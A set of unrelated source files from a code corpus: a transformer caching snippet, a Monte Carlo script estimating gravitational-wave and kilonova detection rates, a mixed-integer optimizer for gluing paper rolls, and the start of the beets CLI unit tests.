attention_mask = input_ids.new_ones(input_ids.shape)
if past:
input_ids = input_ids[:, -1:]
# first step, decoder_cached_states are empty
return {
"input_ids": input_ids, # encoder_outputs is defined. input_ids not needed
"attention_mask": attention_mask,
"past_key_values": past,
"use_cache": use_cache,
}
@staticmethod
def _reorder_cache(past, beam_idx):
reordered_past = ()
for layer_past in past:
reordered_past += (tuple(past_state.index_select(0, beam_idx) for past_state in layer_past),)
return reordered_past
|
the-stack_106_14769
|
#!/usr/bin/env python
import io
import pickle
import sys
import os
import random
import time
from functools import partial
from urllib import parse, request
import numpy as np
import scipy.stats as spstat
from collections import namedtuple
from astropy.time import Time
from astropy.coordinates import Distance
import astropy.table as at
import astropy.units as u, astropy.constants as c
import argparse
import matplotlib.pyplot as plt
from astropy.visualization import hist
import schwimmbad
from scipy.linalg import cholesky
import scipy.integrate as scinteg
from sklearn.preprocessing import MinMaxScaler
import inspiral_range
from ligo.computeDiskMass import computeCompactness, computeDiskMass
import lalsimulation as lalsim
from gwemlightcurves.EjectaFits import DiUj2017
np.random.RandomState(int(time.time()))
EOSNAME = "APR4_EPP"
MAX_MASS = 2.21 # specific to EoS model
detector_asd_links = dict(
ligo='https://dcc.ligo.org/public/0165/T2000012/001/aligo_O4high.txt',
virgo='https://dcc.ligo.org/public/0165/T2000012/001/avirgo_O4high_NEW.txt',
kagra='https://dcc.ligo.org/public/0165/T2000012/001/kagra_80Mpc.txt'
)
def has_ejecta_mass(m1, m2):
"""Calculate whether the binary has any remnant matter based on
Dietrich & Ujevic (2017) or Foucart et. al. (2018) based on APR4
equation of state.
"""
c_ns_1, m_b_1, _ = computeCompactness(m1, EOSNAME)
c_ns_2, m_b_2, _ = computeCompactness(m2, EOSNAME)
if m_b_2 == 0.0 or m_b_1 == 0.0:
# treat as NSBH
m_rem = computeDiskMass(m1, m2, 0., 0., eosname=EOSNAME)
else:
# treat as BNS
m_rem = DiUj2017.calc_meje(m1, m_b_1, c_ns_1, m2, m_b_2, c_ns_2)
return m_rem > 0.0
def get_range(detector):
psd_url = detector_asd_links[detector]
try:
# if downloaded locally
asd_fp = open(os.path.basename(parse.urlparse(psd_url).path), "rb")
except FileNotFoundError:
print(f"Downloading PSD for {detector}")
asd_fp = io.BytesIO(request.urlopen(psd_url).read())
freq, asd = np.loadtxt(asd_fp, unpack=True)
psd = asd**2
return partial(inspiral_range.range, freq, psd)
def get_correlated_series(n_events, upper_chol):
"""
Get some correlated uniformly distributed random series between 0 and 1
"""
rnd = np.random.uniform(0., 1., size=(n_events, 4))
series = rnd @ upper_chol
return series
def get_sim_dutycycles(n_events, upper_chol, h_duty, l_duty, v_duty, k_duty):
"""
Get some correlated duty cycle series
"""
series = get_correlated_series(n_events, upper_chol)
scaler = MinMaxScaler()
scaler.fit(series)
series = scaler.transform(series)
series = series.T
duty_cycles = np.zeros(series.shape)
h_series = series[0,:]
l_series = series[1,:]
v_series = series[2,:]
k_series = series[3,:]
h_on = duty_cycles[0,:]
l_on = duty_cycles[1,:]
v_on = duty_cycles[2,:]
k_on = duty_cycles[3,:]
h_on[h_series <= h_duty] = 1
l_on[l_series <= l_duty] = 1
v_on[v_series <= v_duty] = 1
k_on[k_series <= k_duty] = 1
h_on = h_on.astype(bool)
l_on = l_on.astype(bool)
v_on = v_on.astype(bool)
k_on = k_on.astype(bool)
return h_on, l_on, v_on, k_on
class MinZeroAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if values <= 0 :
parser.error("Minimum value for {0} is 0".format(option_string))
setattr(namespace, self.dest, values)
def get_options(argv=None):
'''
Get commandline options
'''
parser = argparse.ArgumentParser()
parser.add_argument('--mass_distrib', choices=['mw','flat', 'msp'], default='mw', help='Picky BNS mass distribution')
parser.add_argument('--masskey1', type=float, action=MinZeroAction, default=1.4, help='Specify Mass Keyword 1 (mw = mean, flat=lower bound)')
parser.add_argument('--masskey2', type=float, action=MinZeroAction, default=0.09, help='Specify Mass Keyword 2 (mw = sigma, flat=upper bound)')
# Ryan's original value was -5.95 - the update comes from Alexandra Corsi's conservative estimate
# 4.7d-6*4./3.*!pi*(170.)^3.*0.75*0.7 --> ~50
# 3.2d-7*4./3.*!pi*(120.)^3.*0.75*0.7 --> 1
# BTW: conservative and reasonable choice is 1.54d-6*4./3.*!pi*(120.)^3.*0.75*0.7 --> 5-6 events (median)
parser.add_argument('--ntry', default=100, type=int, action=MinZeroAction, help='Set the number of MC samples')
parser.add_argument('--box_size', default=400., action=MinZeroAction, type=float,\
help='Specify the side of the box in which to simulate events')
parser.add_argument('--sun_loss', default=0.61, help='The fraction not observed due to sun', type=float)
parser.add_argument('--mean_lograte', default=-6.49, help='specify the lograthim of the mean BNS rate', type=float)
parser.add_argument('--sig_lograte', default=0.5, type=float, help='specify the std of the mean BNS rate')
parser.add_argument('--hdutycycle', default=0.8, action=MinZeroAction, type=float, help='Set the Hanford duty cycle')
parser.add_argument('--ldutycycle', default=0.8, action=MinZeroAction, type=float, help='Set the Livingston duty cycle')
parser.add_argument('--vdutycycle', default=0.75, action=MinZeroAction, type=float, help='Set the Virgo duty cycle')
parser.add_argument('--kdutycycle', default=0.4, action=MinZeroAction, type=float, help='Set the Kagra duty cycle')
# duty factor motivation: https://dcc.ligo.org/public/0167/G2000497/002/G2000497_OpenLVEM_02Apr2020_kk_v2.pdf
args = parser.parse_args(args=argv)
return args
def main(argv=None):
args = get_options(argv=argv)
np.random.seed(seed=42)
# setup time-ranges
ligo_run_start = Time('2022-06-01T00:00:00.0')
ligo_run_end = Time('2023-06-01T00:00:00.0')
hst_cyc_start = Time('2021-10-01T00:00:00.0')
hst_cyc_end = Time('2023-06-01T00:00:00.0')
eng_time = 2.*u.week
Range = namedtuple('Range', ['start', 'end'])
ligo_run = Range(start=ligo_run_start, end=ligo_run_end)
hst_cycle = Range(start=hst_cyc_start, end=hst_cyc_end)
latest_start = max(ligo_run.start, hst_cycle.start)
earliest_end = min(ligo_run.end, hst_cycle.end)
td = (earliest_end - latest_start) + eng_time
fractional_duration = (td/(1.*u.year)).decompose().value
box_size = args.box_size
volume = box_size**3
# create the mass distribution of the merging neutron star
mass_distrib = args.mass_distrib
# the truncated normal distribution looks to be from:
# https://arxiv.org/pdf/1309.6635.pdf
mean_mass = args.masskey1
sig_mass = args.masskey2
min_mass = args.masskey1
max_mass = args.masskey2
# the two ligo detectors ahve strongly correlated duty cycles
# they are both not very correlated with Virgo
lvc_cor_matrix = np.array([[1., 0.8, 0.5, 0.2],
[0.8, 1., 0.5, 0.2],
[0.5, 0.5, 1., 0.2],
[0.2, 0.2, 0.2, 1.]])
upper_chol = cholesky(lvc_cor_matrix)
# setup duty cycles
h_duty = args.hdutycycle
l_duty = args.ldutycycle
v_duty = args.vdutycycle
k_duty = args.kdutycycle
# setup event rates
mean_lograte = args.mean_lograte
sig_lograte = args.sig_lograte
n_try = args.ntry
temp = at.Table.read('kilonova_phottable_40Mpc.txt', format='ascii')
phase = temp['ofphase']
temphmag = temp['f160w']
tempf200w = temp['f218w']
temprmag = temp['f625w']
# define ranges
ligo_range = get_range('ligo')
virgo_range = get_range('virgo')
kagra_range = get_range('kagra')
def dotry(n):
rate = 10.**(np.random.normal(mean_lograte, sig_lograte))
n_events = np.around(rate*volume*fractional_duration).astype('int')
if n_events == 0:
return tuple(0 for _ in range(15)) # FIXME: fix to prevent unpacking error
print(f"### Num trial = {n}; Num events = {n_events}")
if mass_distrib == 'mw':
mass1 = spstat.truncnorm.rvs(0, np.inf, args.masskey1, args.masskey2, n_events) # FIXME: Unbound local error
mass2 = spstat.truncnorm.rvs(0, np.inf, args.masskey1, args.masskey2, n_events)
elif mass_distrib == 'msp':
print("MSP population chosen, overriding mean_mass and sig_mass if supplied.")
# numbers from https://arxiv.org/pdf/1605.01665.pdf
# two modes, choose a random one each time
mean_mass, sig_mass = random.choice([(1.393, 0.064), (1.807, 0.177)])
mass1 = spstat.truncnorm.rvs(0, np.inf, mean_mass, sig_mass, n_events)
mass2 = spstat.truncnorm.rvs(0, np.inf, mean_mass, sig_mass, n_events)
else:
print("Flat population chosen.")
mass1 = np.random.uniform(min_mass, max_mass, n_events)
mass2 = np.random.uniform(min_mass, max_mass, n_events)
bns_range_ligo = np.array(
[ligo_range(m1=m1, m2=m2) for m1, m2 in zip(mass1, mass2)]
) * u.Mpc
bns_range_virgo = np.array(
[virgo_range(m1=m1, m2=m2) for m1, m2 in zip(mass1, mass2)]
) * u.Mpc
bns_range_kagra = np.array(
[kagra_range(m1=m1, m2=m2) for m1, m2 in zip(mass1, mass2)]
) * u.Mpc
tot_mass = mass1 + mass2
delay = np.random.uniform(0, 365.25, n_events)
delay[delay > 90] = 0
av = np.random.exponential(1, n_events)*0.4
ah = av/6.1
sss17a = -16.9 #H-band
sss17a_r = -15.8 #Rband
sss17a_f200 = -15.4591
minmag = -14.7
maxmag = sss17a - 2.
hmag = temphmag - min(temphmag)
hmag[phase < 2.5] = 0
f200mag = tempf200w - min(tempf200w)
f200mag[phase < 2.5] = 0
magindex = [(phase - x).argmin() for x in delay]
magindex = np.array(magindex)
default_value= [0,]
if n_events == 0:
return default_value, default_value, default_value, default_value, default_value, default_value, 0, 0
absm = np.random.uniform(0, 1, n_events)*abs(maxmag-minmag) + sss17a + hmag[magindex] + ah
absm = np.array(absm)
absm_f200w = np.random.uniform(0, 1, n_events)*abs(maxmag-minmag) + sss17a_f200 + f200mag[magindex]
absm_f200w = np.array(absm_f200w)
# simulate coordinates
x = np.random.uniform(-box_size/2., box_size/2., n_events)*u.megaparsec
y = np.random.uniform(-box_size/2., box_size/2., n_events)*u.megaparsec
z = np.random.uniform(-box_size/2., box_size/2., n_events)*u.megaparsec
dist = (x**2. + y**2. + z**2. + (0.05*u.megaparsec)**2.)**0.5
h_on, l_on, v_on, k_on = get_sim_dutycycles(n_events, upper_chol,
h_duty, l_duty, v_duty, k_duty)
n_detectors_on = np.array(
[sum(_) for _ in np.vstack((h_on, l_on, v_on, k_on)).T]
)
# which detectors observed
dist_ligo_bool = dist <= bns_range_ligo
dist_virgo_bool = dist <= bns_range_virgo
dist_kagra_bool = dist <= bns_range_kagra
h_on_and_observed = h_on * dist_ligo_bool
l_on_and_observed = l_on * dist_ligo_bool
v_on_and_observed = v_on * dist_virgo_bool
k_on_and_observed = k_on * dist_kagra_bool
n_detectors_on_and_obs = np.sum(np.vstack(
(h_on_and_observed, l_on_and_observed, v_on_and_observed,
k_on_and_observed)).T,
axis=1
)
two_det_obs = n_detectors_on_and_obs == 2
three_det_obs = n_detectors_on_and_obs == 3
four_det_obs = n_detectors_on_and_obs == 4
# decide whether there is a kilnova based on remnant matter
has_ejecta_bool = [
has_ejecta_mass(m1, m2) for m1, m2 in zip(mass1, mass2)
]
distmod = Distance(dist)
obsmag = absm + distmod.distmod.value
obsmagf200w = absm_f200w + distmod.distmod.value
em_bool = obsmag < 22.
# whether this event was not affected by then sun
detected_events = np.where(em_bool)
sun_bool = np.random.random(len(detected_events[0])) >= args.sun_loss
em_bool[detected_events] = sun_bool
n2_gw_only = np.where(two_det_obs)[0]
n2_gw = len(n2_gw_only)
n2_good = np.where(two_det_obs & em_bool & has_ejecta_bool)[0]
n2 = len(n2_good)
# sanity check
assert n2_gw >= n2, "GW events ({}) less than EM follow events ({})".format(n2_gw, n2)
n3_gw_only = np.where(three_det_obs)[0]
n3_gw = len(n3_gw_only)
n3_good = np.where(three_det_obs & em_bool & has_ejecta_bool)[0]
n3 = len(n3_good)
# sanity check
assert n3_gw >= n3, "GW events ({}) less than EM follow events ({})".format(n3_gw, n3)
n4_gw_only = np.where(four_det_obs)[0]
n4_gw = len(n4_gw_only)
n4_good = np.where(four_det_obs & em_bool & has_ejecta_bool)[0]
n4 = len(n4_good)
# sanity check
assert n4_gw >= n4, "GW events ({}) less than EM follow events ({})".format(n4_gw, n4)
return dist[n2_good].value.tolist(), tot_mass[n2_good].tolist(),\
dist[n3_good].value.tolist(), tot_mass[n3_good].tolist(),\
dist[n4_good].value.tolist(), tot_mass[n4_good].tolist(),\
obsmag[n2_good].tolist(), obsmag[n3_good].tolist(),\
obsmag[n3_good].tolist(), obsmagf200w[n2_good].tolist(),\
obsmagf200w[n3_good].tolist(), obsmagf200w[n4_good].tolist(),\
n2, n3, n4
with schwimmbad.SerialPool() as pool:
values = list(pool.map(dotry, range(n_try)))
print("Finshed computation, plotting...")
data_dump = dict()
n_detect2 = []
n_detect3 = []
n_detect4 = []
dist_detect2 = []
mass_detect2 = []
dist_detect3 = []
mass_detect3 = []
dist_detect4 = []
mass_detect4 = []
hmag_detect2 = []
hmag_detect3 = []
hmag_detect4 = []
for idx, (d2, m2, d3, m3, d4, m4, h2, h3, h4, f2, f3, f4, n2, n3, n4) in enumerate(values):
if n2 >= 0:
n_detect2.append(n2)
if n3>0:
dist_detect2 += d2
mass_detect2 += m2
hmag_detect2 += f2
if n3>=0:
n_detect3.append(n3)
if n3 > 0:
dist_detect3 += d3
mass_detect3 += m3
hmag_detect3 += f3
if n4>=0:
n_detect4.append(n4)
if n4 > 0:
dist_detect4 += d4
mass_detect4 += m4
hmag_detect4 += f4
data_dump[f"{idx}"] = {"d2": d2, "m2": m2, "d3": d3,
"m3": m3, "d4": d4, "m4": m4,
"h2": h2, "h3": h3, "h4": h4,
"f2": f2, "f3": f3, "f4": f4,
"n2": n2, "n3": n3, "n4": n4}
with open(f"data-dump-{args.mass_distrib}.pickle", "wb") as f:
pickle.dump(data_dump, f)
n_detect2 = np.array(n_detect2)
n_detect3 = np.array(n_detect3)
n_detect4 = np.array(n_detect4)
#print(f"2 det: {n_detect2};\n3 det: {n_detect3};\n4 det: {n_detect4}")
#print(f"2 det mean: {np.mean(n_detect2)};\n3 det mean: {np.mean(n_detect3)};\n4 det mean: {np.mean(n_detect4)}")
fig_kw = {'figsize':(9.5/0.7, 3.5)}
fig, axes = plt.subplots(nrows=1, ncols=3, **fig_kw)
#ebins = np.logspace(0, 1.53, 10)
#ebins = np.insert(ebins, 0, 0)
ebins = np.arange(32)
norm = np.sum(n_detect3)/np.sum(n_detect2)
vals, _, _ = axes[0].hist(n_detect2, histtype='stepfilled', \
bins=ebins, color='C0', alpha=0.3, density=True, zorder=0)
axes[0].hist(n_detect2, histtype='step', \
bins=ebins, color='C0', lw=3, density=True, zorder=3)
bin_centers = (ebins[0:-1] + ebins[1:])/2.
mean_nevents = np.mean(n_detect2)
five_percent, ninetyfive_percent = np.percentile(n_detect2, 5), np.percentile(n_detect2, 95)
axes[0].axvline(round(mean_nevents), color='C0', linestyle='--', lw=2,
label=r'$\langle N\rangle = %d ;~ N_{95} = %d$' % (round(mean_nevents), ninetyfive_percent))
axes[0].axvline(ninetyfive_percent, color='C0',
linestyle='dotted', lw=1)
#vals, bins = np.histogram(n_detect3, bins=ebins, density=True)
mean_nevents = np.mean(n_detect3)
#vals*=norm
#test = dict(zip(ebins, vals))
#print(ebins, vals)
#print("Test")
#print(test)
axes[0].hist(n_detect3, density=True, histtype='stepfilled', color='C1', alpha=0.5, bins=ebins, zorder=1)
axes[0].hist(n_detect3, density=True, histtype='step', color='C1', lw=3, bins=ebins, zorder=2)
#axes[0].hist(list(test.keys()), weights=list(test.values()), histtype='stepfilled', color='C1', alpha=0.5, bins=ebins, zorder=1)
#axes[0].hist(list(test.keys()), weights=list(test.values()), histtype='step', color='C1', lw=3, bins=ebins, zorder=2)
five_percent, ninetyfive_percent = np.percentile(n_detect3, 5), np.percentile(n_detect3, 95)
axes[0].axvline(round(mean_nevents), color='C1', linestyle='--', lw=2,
label=r'$\langle N\rangle = %d ;~ N_{95} = %d$' % (round(mean_nevents), ninetyfive_percent))
axes[0].axvline(ninetyfive_percent, color='C1',
linestyle='dotted', lw=1)
#vals, bins = np.histogram(n_detect4, bins=ebins, density=True)
mean_nevents = np.mean(n_detect4)
#vals*=norm
#test = dict(zip(ebins, vals))
axes[0].hist(n_detect4, density=True, histtype='stepfilled', color='C2', alpha=0.5, bins=ebins, zorder=1)
axes[0].hist(n_detect4, density=True, histtype='step', color='C2', lw=3, bins=ebins, zorder=2)
five_percent, ninetyfive_percent = np.percentile(n_detect4, 5), np.percentile(n_detect4, 95)
axes[0].axvline(round(mean_nevents), color='C2', linestyle='--', lw=2,
label=r'$\langle N \rangle = %d ;~ N_{95} = %d$' % (round(mean_nevents), ninetyfive_percent))
axes[0].axvline(ninetyfive_percent, color='C2',
linestyle='dotted', lw=1)
axes[0].legend(frameon=False, fontsize='small', loc='upper right')
#axes[0].set_xscale('log')
axes[0].set_yscale('log')
axes[0].set_xlim((0., 31))
#axes[0].set_ylim((1e-2, 1))
#######################################################
### print out probabilities of greater than 1 event ###
#######################################################
print("P(N > 1 event detected)")
print("For two detector", np.sum(n_detect2 > 1)/len(n_detect2))
print("For three detector", np.sum(n_detect3 > 1)/len(n_detect2))
print("For four detector", np.sum(n_detect4 > 1)/len(n_detect2))
# save number of detections
with open(f'n-events-{args.mass_distrib}.pickle', 'wb') as f:
res = dict(n_detect2=n_detect2, n_detect3=n_detect3, n_detect4=n_detect4,
dist_detect2=dist_detect2, dist_detect3=dist_detect3, dist_detect4=dist_detect4,
mass_detect2=mass_detect2, mass_detect3=mass_detect3, mass_detect4=mass_detect4,
hmag_detect2=hmag_detect2, hmag_detect3=hmag_detect3, hmag_detect4=hmag_detect4)
pickle.dump(res, f)
dist_range = np.arange(0, 400., 0.1)
patches = list()
legend_text = list()
try:
kde = spstat.gaussian_kde(dist_detect2, bw_method='scott')
pdist = kde(dist_range)
axes[1].plot(dist_range, pdist, color='C0', linestyle='-', lw=3, zorder=4)
patch1 = axes[1].fill_between(dist_range, np.zeros(len(dist_range)), pdist, color='C0', alpha=0.3, zorder=0)
patches.append(patch1)
legend_text.append('2 Detector Events')
mean_dist = np.mean(dist_detect2)
axes[1].axvline(mean_dist, color='C0', linestyle='--', lw=1.5, zorder=6, label=r'$\langle D \rangle = {:.0f}$ Mpc'.format(mean_dist))
ind0_40 = dist_range <= 40.
ind40_80 = (dist_range <= 100.) & (dist_range > 40.)
ind80_160 = (dist_range <= 160.) & (dist_range > 100.)
p0_40 = scinteg.trapz(pdist[ind0_40], dist_range[ind0_40])
p40_80 = scinteg.trapz(pdist[ind40_80], dist_range[ind40_80])
p80_160 = scinteg.trapz(pdist[ind80_160], dist_range[ind80_160])
print(p0_40*5, p40_80*5, p80_160*5)
except ValueError:
print("Could not create KDE since no 2-det detection")
try:
kde = spstat.gaussian_kde(dist_detect3, bw_method='scott')
pdist = kde(dist_range)
axes[1].plot(dist_range, pdist, color='C1', linestyle='-', lw=3, zorder=2)
patch2 = axes[1].fill_between(dist_range, np.zeros(len(dist_range)), pdist, color='C1', alpha=0.5, zorder=1)
patches.append(patch2)
legend_text.append('3 Detector Events')
mean_dist = np.mean(dist_detect3)
axes[1].axvline(mean_dist, color='C1', linestyle='--', lw=1.5, zorder=6, label=r'$\langle D \rangle = {:.0f}$ Mpc'.format(mean_dist))
axes[1].legend(frameon=False, fontsize='small')
except ValueError:
print("Could not create KDE since no 3-det detection")
try:
kde = spstat.gaussian_kde(dist_detect4, bw_method='scott')
pdist = kde(dist_range)
mean_dist = np.mean(dist_detect4)
axes[1].plot(dist_range, pdist, color='C2', linestyle='-', lw=3, zorder=2)
axes[1].axvline(mean_dist, color='C2', linestyle='--', lw=1.5, zorder=6, label=r'$\langle D \rangle = {:.0f}$ Mpc'.format(mean_dist))
patch3 = axes[1].fill_between(dist_range, np.zeros(len(dist_range)), pdist, color='C2', alpha=0.5, zorder=1)
patches.append(patch3)
legend_text.append('4 Detector Events')
axes[1].legend(frameon=False, fontsize='small')
except ValueError:
print("Could not create KDE since no 4-det detection")
h_range = np.arange(15, 23, 0.1)
kde = spstat.gaussian_kde(hmag_detect2, bw_method='scott')
ph = kde(h_range)
axes[2].plot(h_range, ph, color='C0', linestyle='-', lw=3, zorder=4)
axes[2].fill_between(h_range, np.zeros(len(h_range)), ph, color='C0', alpha=0.3, zorder=0)
mean_h = np.mean(hmag_detect2)
axes[2].axvline(mean_h, color='C0', linestyle='--', lw=1.5, zorder=6, label=r'$\langle H \rangle = {:.1f}$ mag'.format(mean_h))
kde = spstat.gaussian_kde(hmag_detect3, bw_method='scott')
ph = kde(h_range)
axes[2].plot(h_range, ph, color='C1', linestyle='-', lw=3, zorder=2)
axes[2].fill_between(h_range, np.zeros(len(h_range)), ph, color='C1', alpha=0.5, zorder=1)
mean_h = np.mean(hmag_detect3)
axes[2].axvline(mean_h, color='C1', linestyle='--', lw=1.5, zorder=6, label=r'$\langle H \rangle = {:.1f}$ mag'.format(mean_h))
axes[2].legend(frameon=False, fontsize='small')
try:
kde = spstat.gaussian_kde(hmag_detect4, bw_method='scott')
ph = kde(h_range)
axes[2].plot(h_range, ph, color='C2', linestyle='-', lw=3, zorder=2)
axes[2].fill_between(h_range, np.zeros(len(h_range)), ph, color='C1', alpha=0.5, zorder=1)
mean_h = np.mean(hmag_detect4)
axes[2].axvline(mean_h, color='C2', linestyle='--', lw=1.5, zorder=6, label=r'$\langle H \rangle = {:.1f}$ mag'.format(mean_h))
axes[2].legend(frameon=False, fontsize='small')
except ValueError:
print("Could not create KDE for h-mag since no 4 detector events found")
axes[1].set_xlabel('Distance ($D$, Mpc)', fontsize='large')
axes[1].set_ylabel('$P(D)$', fontsize='large')
#if args.mass_distrib != 'msp':
# axes[0].set_title(f"Masses {args.mass_distrib}; {args.masskey1} -- {args.masskey2}")
#else:
# axes[0].set_title("MSP bimodal mass @ 1.393 / 1.807 $M_{\odot}$")
axes[0].set_xlabel('Number of Events ($N$)', fontsize='large')
axes[0].set_ylabel('$P(N)$', fontsize='large')
axes[2].set_xlabel('Apparent F475W ($g$, AB mag)', fontsize='large')
axes[2].set_ylabel('$P(H)$', fontsize='large')
axes[0].set_xlim(0, ebins.max())
ymin, ymax = axes[1].get_ylim()
axes[1].set_ylim(0, ymax)
ymin, ymax = axes[2].get_ylim()
axes[2].set_ylim(0, ymax)
fig.legend(patches, legend_text,
'upper center', frameon=False, ncol=3, fontsize='medium')
fig.tight_layout(rect=[0, 0, 1, 0.97], pad=1.05)
fig.savefig(f'gw_detect_{args.mass_distrib}.pdf')
plt.show()
if __name__=='__main__':
argv = sys.argv[1:]
sys.exit(main(argv=argv))
|
the-stack_106_14771
|
"""Class to create and solve the optimization problem."""
import mip
from collections import namedtuple
CluedRole = namedtuple('CluedRole', 'roles_a, roles_b ')
def main():
"""Define main function."""
role_a = [2350, 9200, 6650, 9150]
role_b = [2300, 9150, 2850, 3650, 8250]
roles = (role_a, role_b)
costs = (2, 8)
problem = ClueRoles(roles, costs, max_roles=10, max_length=10000)
problem.solve()
class ClueRoles():
"""Define class for the optimization problem."""
def __init__(self, roles, costs=(2, 8), max_roles=20, max_length=15000):
"""Initialize object."""
self.role_a = roles[0]
self.role_b = roles[1]
self.num_a = len(self.role_a)
self.num_b = len(self.role_b)
self.costs = costs
# costs = (cost_rollen_verkleben, costs_rollen_tauschen)
self.max_roles = max_roles
self.max_length = max_length
def mixed_integer_linear_program(self):
"""Generate mixed integer program."""
milp = mip.Model(sense=mip.MINIMIZE)
########################
# DEFINE VARIABLES
########################
# number of times the roles have to be changed
x_tauschen = milp.add_var(var_type=mip.INTEGER)
# number of times two roles are clued together
x_verkleben = milp.add_var(var_type=mip.INTEGER)
# continuous variables that determine, which roles are clued together
role_a_clue = [[milp.add_var() for i in range(self.max_roles)]
for j in range(self.num_a)]
role_b_clue = [[milp.add_var() for i in range(self.max_roles)]
for j in range(self.num_b)]
# binary variables, that indicate the resulting roles
roles_in_use = [milp.add_var(var_type=mip.BINARY)
for j in range(self.max_roles)]
# binary variables that determine, which roles are clued together
binary_role_a_clued = [[milp.add_var(var_type=mip.BINARY)
for i in range(self.max_roles)]
for j in range(self.num_a)]
binary_role_b_clued = [[milp.add_var(var_type=mip.BINARY)
for i in range(self.max_roles)]
for j in range(self.num_b)]
# gives for each resulting role the number of roles clued together
num_clued_roles_a = [milp.add_var(var_type=mip.INTEGER)
for j in range(self.max_roles)]
num_clued_roles_b = [milp.add_var(var_type=mip.INTEGER)
for j in range(self.max_roles)]
#################
# OBJECTIVE
#################
milp += x_verkleben * self.costs[0] + x_tauschen * self.costs[1]
#####################
# CONSTRAINTS
###################
part1 = mip.xsum(num_clued_roles_a[j] for j in range(self.max_roles))
part2 = mip.xsum(num_clued_roles_b[j] for j in range(self.max_roles))
milp += x_verkleben == part1 + part2
milp += x_tauschen == mip.xsum(roles_in_use[j]
for j in range(self.max_roles))
# definition domains
for j in range(self.max_roles):
for i in range(self.num_a):
milp += role_a_clue[i][j] >= 0
# milp += role_a_clue[i][j] <= 1
# Wurde Rolle j benutzt
milp += roles_in_use[j] >= role_a_clue[i][j]
# binary variables
milp += binary_role_a_clued[i][j] >= role_a_clue[i][j]
for i in range(self.num_b):
milp += role_b_clue[i][j] >= 0
# milp += role_b_clue[i][j] <= 1
# binary variables
milp += binary_role_b_clued[i][j] >= role_b_clue[i][j]
# Anzahl Klebestellen
milp += num_clued_roles_a[j] >= 0
milp += num_clued_roles_b[j] >= 0
milp += num_clued_roles_a[j] >= mip.xsum(binary_role_a_clued[i][j]
for i in range(self.num_a)) - 1
milp += num_clued_roles_b[j] >= mip.xsum(binary_role_b_clued[i][j]
for i in range(self.num_b)) - 1
# Length restriction
milp += mip.xsum(role_a_clue[i][j] * self.role_a[i]
for i in range(self.num_a)) == mip.xsum(role_b_clue[i][j] * self.role_b[i] for i in range(self.num_b))
milp += mip.xsum(role_a_clue[i][j] * self.role_a[i]
for i in range(self.num_a)) <= self.max_length
# Every role can only be used to 100%
for i in range(self.num_a):
milp += 1 >= mip.xsum(role_a_clue[i][j]
for j in range(self.max_roles))
for i in range(self.num_b):
milp += 1 >= mip.xsum(role_b_clue[i][j]
for j in range(self.max_roles))
# use as much of the roles as possible
if sum(self.role_a) <= sum(self.role_b):
milp += sum(self.role_a) == mip.xsum(
mip.xsum(role_a_clue[i][j]*self.role_a[i]
for i in range(self.num_a))
for j in range(self.max_roles))
else:
milp += sum(self.role_b) == mip.xsum(
mip.xsum(role_b_clue[i][j]*self.role_b[i]
for i in range(self.num_b))
for j in range(self.max_roles))
return milp, role_a_clue, role_b_clue
def solve(self):
"""Solve the integer linear program."""
output = self.mixed_integer_linear_program()
milp, role_a_clue, role_b_clue = output
milp.optimize()
final_roles = []
print()
k = 0
for j in range(self.max_roles):
print([role_a_clue[i][j].x for i in range(self.num_a)])
for j in range(self.max_roles):
if sum([role_a_clue[i][j].x for i in range(self.num_a)]) >= 1e-8:
k += 1
print(f'{k}. Rolle:')
clued_roles_a = []
for role in range(self.num_a):
part_a = role_a_clue[role][j].x * self.role_a[role]
clued_roles_a.append(part_a)
clued_roles_b = []
for role in range(self.num_b):
part_b = role_b_clue[role][j].x * self.role_b[role]
clued_roles_b.append(part_b)
final_roles.append(CluedRole(roles_a=clued_roles_a,
roles_b=clued_roles_b))
print('Rollen A:')
print(clued_roles_a)
print('Rollen B:')
print(clued_roles_b)
return final_roles
if __name__ == '__main__':
main()
|
the-stack_106_14773
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the command-line interface.
"""
from __future__ import division, absolute_import, print_function
import os
import shutil
import re
import subprocess
import platform
from copy import deepcopy
import six
import unittest
from mock import patch, Mock
from test import _common
from test.helper import capture_stdout, has_program, TestHelper, control_stdin
from beets import library
from beets import ui
from beets.ui import commands
from beets import autotag
from beets.autotag.match import distance
from beets.mediafile import MediaFile
from beets import config
from beets import plugins
from beets.util.confit import ConfigError
from beets import util
from beets.util import syspath
class ListTest(unittest.TestCase):
def setUp(self):
self.lib = library.Library(':memory:')
self.item = _common.item()
self.item.path = 'xxx/yyy'
self.lib.add(self.item)
self.lib.add_album([self.item])
def _run_list(self, query=u'', album=False, path=False, fmt=u''):
with capture_stdout() as stdout:
commands.list_items(self.lib, query, album, fmt)
return stdout
def test_list_outputs_item(self):
stdout = self._run_list()
self.assertIn(u'the title', stdout.getvalue())
def test_list_unicode_query(self):
self.item.title = u'na\xefve'
self.item.store()
self.lib._connection().commit()
stdout = self._run_list([u'na\xefve'])
out = stdout.getvalue()
if six.PY2:
out = out.decode(stdout.encoding)
self.assertTrue(u'na\xefve' in out)
def test_list_item_path(self):
stdout = self._run_list(fmt=u'$path')
self.assertEqual(stdout.getvalue().strip(), u'xxx/yyy')
def test_list_album_outputs_something(self):
stdout = self._run_list(album=True)
self.assertGreater(len(stdout.getvalue()), 0)
def test_list_album_path(self):
stdout = self._run_list(album=True, fmt=u'$path')
self.assertEqual(stdout.getvalue().strip(), u'xxx')
def test_list_album_omits_title(self):
stdout = self._run_list(album=True)
self.assertNotIn(u'the title', stdout.getvalue())
def test_list_uses_track_artist(self):
stdout = self._run_list()
self.assertIn(u'the artist', stdout.getvalue())
self.assertNotIn(u'the album artist', stdout.getvalue())
def test_list_album_uses_album_artist(self):
stdout = self._run_list(album=True)
self.assertNotIn(u'the artist', stdout.getvalue())
self.assertIn(u'the album artist', stdout.getvalue())
def test_list_item_format_artist(self):
stdout = self._run_list(fmt=u'$artist')
self.assertIn(u'the artist', stdout.getvalue())
def test_list_item_format_multiple(self):
stdout = self._run_list(fmt=u'$artist - $album - $year')
self.assertEqual(u'the artist - the album - 0001',
stdout.getvalue().strip())
